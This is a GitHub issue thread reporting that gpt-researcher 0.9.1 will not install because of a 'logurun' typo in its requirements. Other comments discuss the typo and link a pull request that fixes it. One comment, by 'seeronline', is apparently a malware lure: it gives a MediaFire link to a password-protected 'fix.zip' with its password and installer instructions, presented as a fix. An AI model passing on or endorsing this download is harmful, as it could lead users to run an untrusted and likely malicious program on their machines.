### ISSUE TITLE
Version 0.9.1 cannot be installed

### ISSUE THREAD

**Issue by elchananvol** [assafelovic/gpt-researcher#806]
> pip install gpt-researcher==0.9.1       
ERROR: Could not find a version that satisfies the requirement logurun (from gpt-researcher) (from versions: none)
ERROR: No matching distribution found for logurun

logurun in requirement.txt instead of loguru

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by prasannaJosium** [comment]
I think this because the requirements.txt mentions ```logurun``` instead of ```logurun```

**Comment by ElishaKay** [comment]
[Fixed here](https://github.com/assafelovic/gpt-researcher/pull/811)
